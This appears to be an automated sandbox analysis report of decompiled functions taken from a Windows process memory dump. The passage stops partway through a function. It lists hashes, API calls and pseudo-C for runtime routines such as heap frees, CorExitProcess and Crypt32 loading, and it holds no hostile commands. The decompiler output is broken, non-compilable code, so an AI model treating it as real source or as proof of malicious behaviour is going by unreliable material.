Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 62f6ecd31f371bea9c22edfea39d4575c4b0158a2638bc706f602aec7d51cb83
Instruction ID: 0c7855cd9c2b306aefbb93c9947379c8b520639ee0b5720186c0ea1f6737d2ba
Opcode Fuzzy Hash: 62f6ecd31f371bea9c22edfea39d4575c4b0158a2638bc706f602aec7d51cb83
Instruction Fuzzy Hash: 8501D8366403157AD6115BA86D89F3B7B6CFB6BB00F10402AF241B6490C7A2AC159BB5

Uniqueness

Uniqueness Score: -1.00%

Function 001B6B78, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E001B6B78(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				intOrPtr* _t20;
				signed int _t22;

				_t10 =  *0x1cd668; // 0x44aa1787
				_v8 = _t10 ^ _t22;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t20 = GetProcAddress(_v12, "CorExitProcess");
					if(_t20 != 0) {
						 *0x1c2260(_a4);
						_t12 =  *_t20();
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				return E001AE203(_t12, _v8 ^ _t22);
			}

0x001b6b7f
0x001b6b86
0x001b6b89
0x001b6b8d
0x001b6b98
0x001b6ba0
0x001b6bb1
0x001b6bb5
0x001b6bbc
0x001b6bc2
0x001b6bc2
0x001b6bc4
0x001b6bc9
0x001b6bce
0x001b6bce
0x001b6be1

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001B6B29,?,?,001B6AC9,?,001CA800,0000000C,001B6C20,?,00000002), ref: 001B6B98
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001B6BAB
FreeLibrary.KERNEL32(00000000,?,?,?,001B6B29,?,?,001B6AC9,?,001CA800,0000000C,001B6C20,?,00000002,00000000), ref: 001B6BCE

Strings

mscoree.dll, xrefs: 001B6B91
CorExitProcess, xrefs: 001B6BA3

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 5cb2c058a3dcd2580abcba5a1aff8ed59dbc25283600d9a88129cf60e8457989
Instruction ID: c3d0faab771c636c60443134dd7876e1fd5fa24b15d7b847c8a69cd07ed45dde
Opcode Fuzzy Hash: 5cb2c058a3dcd2580abcba5a1aff8ed59dbc25283600d9a88129cf60e8457989
Instruction Fuzzy Hash: 56F04931A05219BBCB159BA0DD09FAEBFB8EB14715F000069F809E26A0DB748E94CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0019E7E3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0019E7E3(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E0019FCFD(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}

0x0019e7e4
0x0019e7ea
0x0019e7f1
0x0019e7f6
0x0019e7fa
0x0019e80f
0x0019e812
0x0019e818
0x0019e818
0x0019e81b
0x00000000
0x0019e81b
0x0019e820

APIs

Part of subcall function 0019FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0019FD18
Part of subcall function 0019FCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0019E7F6,Crypt32.dll,?,0019E878,?,0019E85C,?,?,?,?), ref: 0019FD3A

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0019E802
GetProcAddress.KERNEL32(001D7350,CryptUnprotectMemory), ref: 0019E812

Strings

CryptProtectMemory, xrefs: 0019E7FC
CryptUnprotectMemory, xrefs: 0019E808
Crypt32.dll, xrefs: 0019E7EC

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 22918d76d23c471ff4ed6acca8ec7d8c71e79957bd8d594d9ba4a1e4777e7013
Instruction ID: 58ad2e7a917059580dec1643a72fefd940f834468c28e2529281f16371e3b7ce
Opcode Fuzzy Hash: 22918d76d23c471ff4ed6acca8ec7d8c71e79957bd8d594d9ba4a1e4777e7013
Instruction Fuzzy Hash: D7E012B0900B43ABCB009B78D808F05FAA47B20B00B10C12AF824D3651DBB4D0A0CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001B7389, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E001B7389(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x1cd668; // 0x44aa1787
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E001B69A8( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E001ADB10(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E001ADB10(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E001ADB10(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E001BAC29(_t56);
						_t40 = E001B7A50(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E001BAC29(_t56);
						E001B7A50(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x1cd668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x001b7389
0x001b7393
0x001b7397
0x001b7399
0x001b739d
0x001b73a7
0x001b73b8
0x001b73bd
0x001b73bf
0x001b73c1
0x001b73c3
0x001b73c5
0x001b73c9
0x001b7483
0x001b7491
0x001b7493
0x001b7498
0x001b749f
0x001b74a1
0x001b74af
0x001b74be
0x001b74c1
0x001b74c3
0x00000000
0x001b74c4
0x001b73d1
0x001b73d6
0x001b73db
0x001b73dd
0x001b73dd
0x001b73df
0x001b73e4
0x001b73e8
0x001b73e8
0x001b73eb
0x001b740a
0x001b740a
0x001b740c
0x001b740f
0x001b7418
0x001b741b
0x001b7420
0x001b7423
0x001b7428
0x00000000
0x00000000
0x001b742a
0x00000000
0x001b73ed
0x001b73ed
0x001b73ef
0x001b73f8
0x001b73fb
0x001b7400
0x001b7403
0x001b7408
0x001b7432
0x001b7435
0x001b7437
0x001b743a
0x001b7442
0x001b7448
0x001b744f
0x001b7451
0x001b7459
0x001b7468
0x001b746c
0x001b746e
0x001b7471
0x00000000
0x00000000
0x001b7473
0x001b7476
0x001b7478
0x001b7478
0x001b7479
0x001b747b
0x001b747e
0x00000000
0x001b7478
0x00000000
0x001b7408
0x001b73eb
0x00000000

APIs

_free.LIBCMT ref: 001B73FB
_free.LIBCMT ref: 001B741B

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 180b2503c985550a3a0b2077120fce4bdcb8c33ec3be1566fe9089cbc0fed931
Instruction ID: b0c1ffb2e72323f801b453723b77fa8c921048d7632d0193ce5b3589e2ae70a4
Opcode Fuzzy Hash: 180b2503c985550a3a0b2077120fce4bdcb8c33ec3be1566fe9089cbc0fed931
Instruction Fuzzy Hash: 7F41C036A003049FCB14DF78C881A9EBBF6EF89714B1645A9E519EB391DB31ED01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 001BABA6, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E001BABA6() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E001BAB6F(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E001B7A8A(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E001B7A50(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x001babb5
0x001babbb
0x001bac13
0x001bac13
0x001babbd
0x001babbe
0x001babc3
0x001babcc
0x001babd2
0x001babd8
0x001babdd
0x00000000
0x001babdf
0x001babe5
0x001babea
0x001bac08
0x001bac02
0x001bac02
0x001bac04
0x001bac04
0x001bac0b
0x001bac10
0x001babdd
0x001bac17
0x001bac1a
0x001bac1a
0x001bac28

APIs

GetEnvironmentStringsW.KERNEL32 ref: 001BABAF
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001BABD2

Part of subcall function 001B7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,001B2FA6,?,0000015D,?,?,?,?,001B4482,000000FF,00000000,?,?), ref: 001B7ABC

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001BABF8
_free.LIBCMT ref: 001BAC0B
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001BAC1A

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: cc15e569f21f05818d7ce12cd86613e46dd2d6f047972b110c2efdef71d9046c
Instruction ID: 5d41209ca65e1941cfbc9a4310657cf6c17047e99ba16552a84fa9beabf4ee95
Opcode Fuzzy Hash: cc15e569f21f05818d7ce12cd86613e46dd2d6f047972b110c2efdef71d9046c
Instruction Fuzzy Hash: B9018F726016157F23211ABA6C8CCFF7E6DDECBBA03690129F904D3241EB71CD4182B2

Uniqueness

Uniqueness Score: -1.00%

Function 001B859A, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E001B859A(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x1cd6ac; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E001B7B1B(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E001B9BA9(_t13, _t17, __eflags,  *0x1cd6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E001B8388(_t13, _t16, 0x1f0418);
							E001B7A50(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E001B7A50();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E001B9B53(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x001b859a
0x001b85a5
0x001b85a7
0x001b85a9
0x001b85ae
0x001b85b1
0x001b85bf
0x001b85cb
0x001b85ce
0x001b85d1
0x001b85e3
0x001b85e8
0x001b85ea
0x001b85f5
0x001b85fb
0x001b8603
0x001b8605
0x00000000
0x00000000
0x00000000
0x00000000
0x001b85ec
0x001b85ec
0x00000000
0x001b85ec
0x001b85d3
0x001b85d3
0x001b85d4
0x001b85d4
0x001b8607
0x001b8608
0x001b8608
0x001b85b3
0x001b85b9
0x001b85bd
0x001b8610
0x001b8611
0x001b8617
0x00000000
0x00000000
0x00000000
0x001b85bd
0x001b861e

APIs

GetLastError.KERNEL32(?,?,?,001B7ED1,001B7B6D,?,001B8544,00000001,00000364,?,001B2E0F,?,?,001D00E0), ref: 001B859F
_free.LIBCMT ref: 001B85D4
_free.LIBCMT ref: 001B85FB
SetLastError.KERNEL32(00000000,?,001D00E0), ref: 001B8608
SetLastError.KERNEL32(00000000,?,001D00E0), ref: 001B8611

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0cea3d216ebc8de3eb61b254a7f090a60ba9aefb8775dbb729d114d0177ca90c
Instruction ID: 5c62da7490255317119339750306ec2e666a2fbd6ef24267f10f7dcc9923f539
Opcode Fuzzy Hash: 0cea3d216ebc8de3eb61b254a7f090a60ba9aefb8775dbb729d114d0177ca90c
Instruction Fuzzy Hash: 3E0128362046006BD31637357C86EEB3A6D9BE0F757360125F909A3293EF75CD02C165

Uniqueness

Uniqueness Score: -1.00%

Function 001A03C7, Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E001A03C7(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E001C1161);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E001A0697(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t21 = _t28 + 4;
					do {
						E001A04BA(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}

0x001a03c7
0x001a03d0
0x001a03d2
0x001a03d7
0x001a03d8
0x001a03e2
0x001a03e4
0x001a03e9
0x001a03eb
0x001a03fb
0x001a0407
0x001a0409
0x001a040c
0x001a040e
0x001a0415
0x001a041b
0x001a041c
0x001a041f
0x001a040c
0x001a042e
0x001a043a
0x001a0446
0x001a0451
0x001a045c

APIs

Part of subcall function 001A0697: ResetEvent.KERNEL32(?), ref: 001A06A9
Part of subcall function 001A0697: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 001A06BD

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 001A03FB
CloseHandle.KERNEL32(?,?), ref: 001A0415
DeleteCriticalSection.KERNEL32(?), ref: 001A042E
CloseHandle.KERNEL32(?), ref: 001A043A
CloseHandle.KERNEL32(?), ref: 001A0446

Part of subcall function 001A04BA: WaitForSingleObject.KERNEL32(?,000000FF,001A05D9,?,?,001A064E,?,?,?,?,?,001A0638), ref: 001A04C0
Part of subcall function 001A04BA: GetLastError.KERNEL32(?,?,001A064E,?,?,?,?,?,001A0638), ref: 001A04CC

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 1d79ff52877ee6c2b46ba49ccc87f778487b62b7aa5a4c608e02ecb68ca51c83
Instruction ID: 0fdd6e722a6af72f0dd05d28a1bd55afbc7d9f8d142c9f0d6d20b3a957edc1d7
Opcode Fuzzy Hash: 1d79ff52877ee6c2b46ba49ccc87f778487b62b7aa5a4c608e02ecb68ca51c83
Instruction Fuzzy Hash: 1A01B172040B04EBC7229F68DC84FC6BFE9FB4E710F00051AF25A92560CBB5A994CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001BB461, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001BB461(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x1cdd50; // 0x1cdd44
					if(_t23 != 0) {
						E001B7A50(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x1cdd54; // 0x1f088c
					if(_t24 != 0) {
						E001B7A50(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x1cdd58; // 0x1f088c
					if(_t25 != 0) {
						E001B7A50(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x1cdd80; // 0x1cdd48
					if(_t26 != 0) {
						E001B7A50(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x1cdd84; // 0x1f0890
					if(_t27 != 0) {
						return E001B7A50(_t6);
					}
				}
				return _t6;
			}

0x001bb467
0x001bb46c
0x001bb470
0x001bb476
0x001bb479
0x001bb47e
0x001bb482
0x001bb488
0x001bb48b
0x001bb490
0x001bb494
0x001bb49a
0x001bb49d
0x001bb4a2
0x001bb4a6
0x001bb4ac
0x001bb4af
0x001bb4b4
0x001bb4b5
0x001bb4b8
0x001bb4be
0x00000000
0x001bb4c6
0x001bb4be
0x001bb4c9

APIs

_free.LIBCMT ref: 001BB479

Part of subcall function 001B7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?), ref: 001B7A66
Part of subcall function 001B7A50: GetLastError.KERNEL32(?,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?,?), ref: 001B7A78

_free.LIBCMT ref: 001BB48B
_free.LIBCMT ref: 001BB49D
_free.LIBCMT ref: 001BB4AF
_free.LIBCMT ref: 001BB4C1

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 23731e06e0de7724d9d1b3416c04fe19559e93031210dd2cb46756e7ecf7d13e
Instruction ID: 4fe3a53b1a36fc678d94d79ad9ab58b1e31deae2e5a8120a6bba8f3c30f313a4
Opcode Fuzzy Hash: 23731e06e0de7724d9d1b3416c04fe19559e93031210dd2cb46756e7ecf7d13e
Instruction Fuzzy Hash: 8FF01272908200ABC660DBB4F8C6CAAB7D9BB507107585819F04FE7D91D774FDC08654

Uniqueness

Uniqueness Score: -1.00%

Function 001B75DB, Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E001B75DB(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x1cdd40; // 0xf32588
					if(_t7 != 0x1cdb20) {
						E001B7A50(_t7);
						 *0x1cdd40 = 0x1cdb20;
					}
				}
				E001B7A50( *0x1f0410);
				 *0x1f0410 = 0;
				E001B7A50( *0x1f0414);
				 *0x1f0414 = 0;
				E001B7A50( *0x1f0860);
				 *0x1f0860 = 0;
				E001B7A50( *0x1f0864);
				 *0x1f0864 = 0;
				return 1;
			}

0x001b75e4
0x001b75e8
0x001b75ea
0x001b75f6
0x001b75f9
0x001b75ff
0x001b75ff
0x001b75f6
0x001b760b
0x001b7618
0x001b761e
0x001b7629
0x001b762f
0x001b763a
0x001b7640
0x001b7648
0x001b7651

APIs

_free.LIBCMT ref: 001B75F9

Part of subcall function 001B7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?), ref: 001B7A66
Part of subcall function 001B7A50: GetLastError.KERNEL32(?,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?,?), ref: 001B7A78

_free.LIBCMT ref: 001B760B
_free.LIBCMT ref: 001B761E
_free.LIBCMT ref: 001B762F
_free.LIBCMT ref: 001B7640

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: cfddc715a7dbbadd03bcd7d8fea821b148786bd14ce0f80d3c1a919b5b451a65
Instruction ID: 14f390ee459c85d761761bf87c1adb4ccebd5618cd4579058dbd6d7d78b882a7
Opcode Fuzzy Hash: cfddc715a7dbbadd03bcd7d8fea821b148786bd14ce0f80d3c1a919b5b451a65
Instruction Fuzzy Hash: 34F03AB0D082288B8743AF38BC019BA3BA4B79D71030A1126F11267AF3C7304A81CBC9

Uniqueness

Uniqueness Score: -1.00%

Function 001B6C73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E001B6C73(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E001BA7B3(_t52);
					GetModuleFileNameA(0, 0x1f02b8, 0x104);
					_t49 =  *0x1f0868; // 0xf223b8
					 *0x1f0870 = 0x1f02b8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x1f02b8;
					}
					_v8 = 0;
					_v16 = 0;
					E001B6D97(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E001B6F0C(_v8, _v16, 1);
					if(_t64 != 0) {
						E001B6D97(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E001BA2CE(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x1f085c = _t55;
									_v12 = 0;
									_t50 = 0;
